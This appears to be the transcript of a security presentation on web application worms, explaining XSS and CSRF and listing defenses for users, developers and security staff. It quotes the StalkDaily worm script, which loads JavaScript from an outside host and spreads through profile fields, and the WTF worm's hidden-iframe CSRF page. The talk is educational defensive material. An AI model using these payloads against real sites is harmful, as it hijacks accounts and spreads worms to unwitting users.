Web Application Worms
DESCRIPTION
Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or target the web application's users (e.g. via XSS). In recent years a new type of attack has appeared in which an infected, innocent user goes on to infect other users (AKA web application worms). Such attacks usually show exponential growth and cause massive damage. In this presentation we discuss how a web application worm is developed and, most importantly, how to protect your website from web application worms.
TRANSCRIPT
@mostafasiraj
Web Application Worms
By: Mostafa Siraj
Agenda
• Computer Worms
• Why Hackers Develop Web Application Worms
• Web Application Worms
• Introduction to XSS
• StalkDaily Worm on Twitter - XSS Worm
• Introduction to CSRF
• WTF Worm on Twitter – CSRF Worm
• Potential Business Impact
• XSS & CSRF Defenses for
  • Users
  • Web Developers
  • Security Professionals
• Questions
DISCLAIMER
– Hacking websites is ILLEGAL
– This presentation is meant for educational purposes ONLY
– Only use this stuff on YOUR website and YOUR account
Computer Worm
A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it.
(1) According to Wikipedia
Why Hackers Develop Web Application Worms
• Easier to develop
• Cross platform (Windows, Linux, OSX and Android) since execution occurs in the web browser
• Don’t rely on browser, application or OS vulnerabilities
• Can propagate faster and cleaner than even the most notorious worms
• 1.01 billion active users on FB (2) according to Yahoo Finance
• 170 million active users on Twitter (3) according to TechCrunch
Percentage likelihood that at least one serious vulnerability will appear in a website
(4) According to the WhiteHat Security Website Statistics Report, Summer 2012
Web Application Worms
An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagates among visitors of a website in an attempt to progressively infect other visitors.
(5) According to Wikipedia with modification
You’ll see how a worm can be created using a CSRF vulnerability only, without XSS.
How XSS Starts (diagram labelled: Website, Adidas)
Cross Site Scripting (Reflected)
(diagram: Vulnerable Site, Hacker Site, Cookie; the user clicks the URL example.com?q=<script>…….)
Cross Site Scripting (Stored XSS)
(diagram: Vulnerable Site, Hacker Site, Cookie; the user requests a public page)
XSS Worms
StalkDaily Worm on Twitter
The bio field allowed JavaScript
<script src="hxxp://mikeyylolz.uuuq.com/x.js" />
StalkDaily Worm
StalkDaily Script (6) source: dcortesi.com
update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update")
StalkDaily Infected Users
What About CSRF Worms
CSRF Example
User has to be logged in
Click Here to Win
https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999
MyBank.com
CSRF Worms
WTF Worm on Twitter
Updating status on Twitter wasn’t protected from CSRF
By visiting the hacker's site, your Twitter account automatically writes two tweets
WTF Worm
WTF Worm Script (7) script source: http://christianheilmann.com
<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>
Discussion about WTF worm on Twitter
XSS and CSRF on Facebook
Searches were done on Google
Potential Business Impact of Web Application Worms
• The snowball effect (Samy versus Code Red)
• Web browser botnets (DDoS)
• Think about a worm targeting eBay or Amazon (purchases, reviews, etc.)
• Stealing users’ credentials (MySpace worm in 2006) (10) according to computerworld.com
• What could happen if AdSense or Facebook Connect were compromised with a web application worm
• “High Roller” malware targeting cloud-based banking (estimated losses 75M-2.5B) (11) according to redmondmag.com
XSS & CSRF Defenses
Defenses for Users
• Exercise caution when clicking on links sent by email, instant message or through social networks
• Use ScriptNo on Chrome and NoScript on Firefox (use IE at your own risk)
• Avoid questionable websites and cracked software
• Stay informed about security incidents
Defenses for Web Developers
XSS
– Input validation (accept only known good)
– Output encoding (ESAPI)
– Set the session cookie to be “HTTPOnly”
– Specify the output encoding (UTF-8, ASCII, etc.)
– Do not use "blacklist" validation
– Don’t encode/decode more than once
– (8) XSS Prevention Cheat Sheet on OWASP
CSRF
– Use CSRFGuard from OWASP
– Do not use the GET method for any request that triggers a state change
– Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation
– Ensure that there are no XSS vulnerabilities in your application
– (9) CSRF Prevention Cheat Sheet on OWASP
Defenses for Security Professionals
• Remember “The natural way of writing code is insecure”
• Developers must take application security training
• Secure the whole SDLC
• Assessments and penetration tests
• White box and black box testing
• Start considering a WAF
Questions
References
(1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm
(2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html
(3) Active Users on Twitter. http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own-clients/
(4) WhiteHat Security Website Statistics Report. https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf
(5) XSS Worms on Wikipedia. http://en.wikipedia.org/wiki/XSS_worm
(6) StalkDaily script. http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/
(7) WTF script. http://christianheilmann.com
(8) XSS Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
(9) CSRF Prevention Cheat Sheet. https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(10) MySpace worm. http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit
(11) High Roller malware. http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx